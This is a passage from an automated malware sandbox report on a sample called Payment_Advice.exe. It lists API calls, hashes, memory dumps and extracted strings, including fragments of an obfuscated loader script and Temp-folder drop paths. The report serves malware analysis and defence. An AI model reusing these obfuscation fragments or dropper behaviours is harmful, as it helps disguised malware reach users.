                                                  • Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                  • String ID: $M$N
                                                  • API String ID: 1638840714-813528018
                                                  • Opcode ID: 05935c29ea04aee5657b6778d98d1933a7035246dab6fdb79b38fb6bca2f1c75
                                                  • Instruction ID: 29e4c212ffdeb16812bd97cb13f1a8c590c5d02c92ec483b1b79380362aa6ea4
                                                  • Opcode Fuzzy Hash: 05935c29ea04aee5657b6778d98d1933a7035246dab6fdb79b38fb6bca2f1c75
                                                  • Instruction Fuzzy Hash: 88026FB0A00209EFEB209F54DD85AAE7BB5FB84314F10817AF610B62E1C7799D52CF58
                                                  APIs
                                                  • GetDlgItem.USER32(?,000003FB), ref: 00404617
                                                  • SetWindowTextW.USER32(00000000,?), ref: 00404641
                                                  • SHBrowseForFolderW.SHELL32(?), ref: 004046F2
                                                  • CoTaskMemFree.OLE32(00000000), ref: 004046FD
                                                  • lstrcmpiW.KERNEL32(: Completed,004226D0,00000000,?,?), ref: 0040472F
                                                  • lstrcatW.KERNEL32(?,: Completed), ref: 0040473B
                                                  • SetDlgItemTextW.USER32(?,000003FB,?), ref: 0040474D
                                                    • Part of subcall function 004056A8: GetDlgItemTextW.USER32(?,?,00000400,00404784), ref: 004056BB
                                                    • Part of subcall function 0040617C: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Payment_Advice.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,75923420,00403510), ref: 004061DF
                                                    • Part of subcall function 0040617C: CharNextW.USER32(?,?,?,00000000), ref: 004061EE
                                                    • Part of subcall function 0040617C: CharNextW.USER32(?,"C:\Users\user\Desktop\Payment_Advice.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,75923420,00403510), ref: 004061F3
                                                    • Part of subcall function 0040617C: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,75923420,00403510), ref: 00406206
                                                  • GetDiskFreeSpaceW.KERNEL32(004206A0,?,?,0000040F,?,004206A0,004206A0,?,00000000,004206A0,?,?,000003FB,?), ref: 0040480E
                                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404829
                                                  • SetDlgItemTextW.USER32(00000000,00000400,00420690), ref: 004048AF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd
                                                  Similarity
                                                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                                  • String ID: ';$Rejsemontrer=$Mazing.SubString(4669,3);.$Rejsemontrer($Mazing) "$: Completed$A$C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes
                                                  • API String ID: 2246997448-2698222531
                                                  • Opcode ID: f2a9d0b57340297d45baa60d2932fe1aa1b7a4c7a5e87a3ea4adcdb859a397aa
                                                  • Instruction ID: c4517917acc678d55e137743079e569baa2315114eae4e5bd7326678801c6655
                                                  • Opcode Fuzzy Hash: f2a9d0b57340297d45baa60d2932fe1aa1b7a4c7a5e87a3ea4adcdb859a397aa
                                                  • Instruction Fuzzy Hash: B69171B1900219EBDB11AFA1CC85AAF77B8EF85314F10843BF611B72D1D77C9A418B69
                                                  APIs
                                                  • CoCreateInstance.OLE32(00407474,?,00000001,00407464,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020BD
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Whereas, xrefs: 004020F5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd
                                                  Similarity
                                                  • API ID: CreateInstance
                                                  • String ID: C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Whereas
                                                  • API String ID: 542301482-2435848561
                                                  • Opcode ID: 8b26743c023bf28b8b2e00583d47188004e3d905e92f390383a9ff735553564a
                                                  • Instruction ID: c11495a377249a79f2c0f90d15cc2262a1b8c0356f549485b3d6f64f05c33611
                                                  • Opcode Fuzzy Hash: 8b26743c023bf28b8b2e00583d47188004e3d905e92f390383a9ff735553564a
                                                  • Instruction Fuzzy Hash: 51416F75A00104BFCB00DFA8C988EAE7BB6EF48314B20456AF905EB2D1CB79ED41CB55
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040277D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd
                                                  Similarity
                                                  • API ID: FileFindFirst
                                                  • String ID:
                                                  • API String ID: 1974802433-0
                                                  • Opcode ID: c0063f51e7f363112a8f0b2caa108a2fa28ea3b78be3eb4e01cdcd5ed5f571bf
                                                  • Instruction ID: 660448b4c8776a587482eabd0d7c95c139f1dfbade13b447c4bb41c6a72f42af
                                                  • Opcode Fuzzy Hash: c0063f51e7f363112a8f0b2caa108a2fa28ea3b78be3eb4e01cdcd5ed5f571bf
                                                  • Instruction Fuzzy Hash: 7EF082B1614114DBDB00DFA5DD499AEB378FF15314F60097BF111F31D0D6B459409B2A
                                                  APIs
                                                  • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404368
                                                  • GetDlgItem.USER32(?,000003E8), ref: 0040437C
                                                  • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404399
                                                  • GetSysColor.USER32(?), ref: 004043AA
                                                  • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004043B8
                                                  • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004043C6
                                                  • lstrlenW.KERNEL32(?), ref: 004043CB
                                                  • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004043D8
                                                  • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004043ED
                                                  • GetDlgItem.USER32(?,0000040A), ref: 00404446
                                                  • SendMessageW.USER32(00000000), ref: 0040444D
                                                  • GetDlgItem.USER32(?,000003E8), ref: 00404478
                                                  • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004044BB
                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 004044C9
                                                  • SetCursor.USER32(00000000), ref: 004044CC
                                                  • ShellExecuteW.SHELL32(0000070B,open,00427180,00000000,00000000,00000001), ref: 004044E1
                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 004044ED
                                                  • SetCursor.USER32(00000000), ref: 004044F0
                                                  • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040451F
                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404531
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                  • String ID: : Completed$AB@$N$open
                                                  • API String ID: 3615053054-1317861079
                                                  • Opcode ID: ade7f38ee6ed01377910c42966ef7019c8b9a8a80681b66c8b0a0f2d68505ed8
                                                  • Instruction ID: a1eca56f6606bae04d2d34ddc617297d88c2ed2d28d9e68ba70837b4d7182fad
                                                  • Opcode Fuzzy Hash: ade7f38ee6ed01377910c42966ef7019c8b9a8a80681b66c8b0a0f2d68505ed8
                                                  • Instruction Fuzzy Hash: 657160F1A00209BFDB109F64DD85A6A7B69FB84755F00803AF705BA2D0C778AD51CFA9
                                                  APIs
                                                  • lstrcpyW.KERNEL32(00425D70,NUL), ref: 00405C16
                                                  • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00405DAA,?,?,00000001,00405922,?,00000000,000000F1,?), ref: 00405C3A
                                                  • GetShortPathNameW.KERNEL32(00000000,00425D70,00000400), ref: 00405C43
                                                    • Part of subcall function 00405AB9: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AC9
                                                    • Part of subcall function 00405AB9: lstrlenA.KERNEL32(00405CF3,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AFB
                                                  • GetShortPathNameW.KERNEL32(?,00426570,00000400), ref: 00405C60
                                                  • wsprintfA.USER32 ref: 00405C7E
                                                  • GetFileSize.KERNEL32(00000000,00000000,00426570,C0000000,00000004,00426570,?,?,?,?,?), ref: 00405CB9
                                                  • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405CC8
                                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405D00
                                                  • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00425970,00000000,-0000000A,00409544,00000000,[Rename],00000000,00000000,00000000), ref: 00405D56
                                                  • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405D68
                                                  • GlobalFree.KERNEL32(00000000), ref: 00405D6F
                                                  • CloseHandle.KERNEL32(00000000), ref: 00405D76
                                                    • Part of subcall function 00405B54: GetFileAttributesW.KERNELBASE(00000003,00402DFD,00437800,80000000,00000003), ref: 00405B58
                                                    • Part of subcall function 00405B54: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B7A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd
                                                  Similarity
                                                  • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
                                                  • String ID: %ls=%ls$NUL$[Rename]$p]B$peB
                                                  • API String ID: 1265525490-3322868524
                                                  • Opcode ID: 6ada627b1bf3b80d97c94aeeab690a13cb6367ef01103192a9b7a9c8b7587d18
                                                  • Instruction ID: 0cb0380f10309b38a88638d348484b434b9e263fedf19fa463d2a85e12a62083
                                                  • Opcode Fuzzy Hash: 6ada627b1bf3b80d97c94aeeab690a13cb6367ef01103192a9b7a9c8b7587d18
                                                  • Instruction Fuzzy Hash: 09410571604B197FD2206B716C4DF6B3A6CEF45714F14413BBA01B62D2E638AC018E7D
                                                  APIs
                                                  • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                  • BeginPaint.USER32(?,?), ref: 00401047
                                                  • GetClientRect.USER32(?,?), ref: 0040105B
                                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                  • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                  • DeleteObject.GDI32(?), ref: 004010ED
                                                  • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                  • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                  • SelectObject.GDI32(00000000,?), ref: 00401140
                                                  • DrawTextW.USER32(00000000,004281E0,000000FF,00000010,00000820), ref: 00401156
                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                  • DeleteObject.GDI32(?), ref: 00401165
                                                  • EndPaint.USER32(?,?), ref: 0040116E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd
                                                  Similarity
                                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                  • String ID: F
                                                  • API String ID: 941294808-1304234792
                                                  • Opcode ID: 0e57b95dfdd8f299c9740ed801e1ea7310e3bc8a8783e459bd01da44e8a50aec
                                                  • Instruction ID: 126a239e0572de30fb8c34ac70cebce50066b6690b2383a097db7944ba687981
                                                  • Opcode Fuzzy Hash: 0e57b95dfdd8f299c9740ed801e1ea7310e3bc8a8783e459bd01da44e8a50aec
                                                  • Instruction Fuzzy Hash: DA419A71804249AFCB058FA5DD459BFBFB9FF48310F00802AF951AA1A0C738EA51DFA5
                                                  APIs
                                                  • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Payment_Advice.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,75923420,00403510), ref: 004061DF
                                                  • CharNextW.USER32(?,?,?,00000000), ref: 004061EE
                                                  • CharNextW.USER32(?,"C:\Users\user\Desktop\Payment_Advice.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,75923420,00403510), ref: 004061F3
                                                  • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,75923420,00403510), ref: 00406206
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd
                                                  Similarity
                                                  • API ID: Char$Next$Prev
                                                  • String ID: "C:\Users\user\Desktop\Payment_Advice.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                  • API String ID: 589700163-1704388407
                                                  • Opcode ID: bf19904cbb26e83114afcd58bf256c97857e1bb2abc1c9c3e805ea3815cda1ed
                                                  • Instruction ID: 7432597920acc0cf63456e540fa2db4f3ec2516b3ebf296f4b2d54ebc9aa4c6f
                                                  • Opcode Fuzzy Hash: bf19904cbb26e83114afcd58bf256c97857e1bb2abc1c9c3e805ea3815cda1ed
                                                  • Instruction Fuzzy Hash: B711B67580021295EB303B548C40BB762F8AF54760F56803FE996772C2EB7C5C9286BD
                                                  APIs
                                                  • GetWindowLongW.USER32(?,000000EB), ref: 004041B1
                                                  • GetSysColor.USER32(00000000), ref: 004041CD
                                                  • SetTextColor.GDI32(?,00000000), ref: 004041D9
                                                  • SetBkMode.GDI32(?,?), ref: 004041E5
                                                  • GetSysColor.USER32(?), ref: 004041F8
                                                  • SetBkColor.GDI32(?,?), ref: 00404208
                                                  • DeleteObject.GDI32(?), ref: 00404222
                                                  • CreateBrushIndirect.GDI32(?), ref: 0040422C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd
                                                  Similarity
                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                  • String ID:
                                                  • API String ID: 2320649405-0
                                                  • Opcode ID: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                  • Instruction ID: 87ec7ba1b4d1524bc80d11c5e2deb64ad1684491122c805edd444a6dd702efce
                                                  • Opcode Fuzzy Hash: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                  • Instruction Fuzzy Hash: 8521C6B1904744ABC7219F68DD08B4B7BF8AF40714F048A6DF996E22E0C738E944CB25
                                                  APIs
                                                  • ReadFile.KERNEL32(?,?,?,?), ref: 004025D9
                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402614
                                                  • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402637
                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040264D
                                                    • Part of subcall function 00405BD7: ReadFile.KERNELBASE(00409230,00000000,00000000,00000000,00000000,habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek,0040BE78,0040330A,00409230,00409230,004031FC,habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek,00004000,?,00000000,?), ref: 00405BEB
                                                    • Part of subcall function 00405E2F: wsprintfW.USER32 ref: 00405E3C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
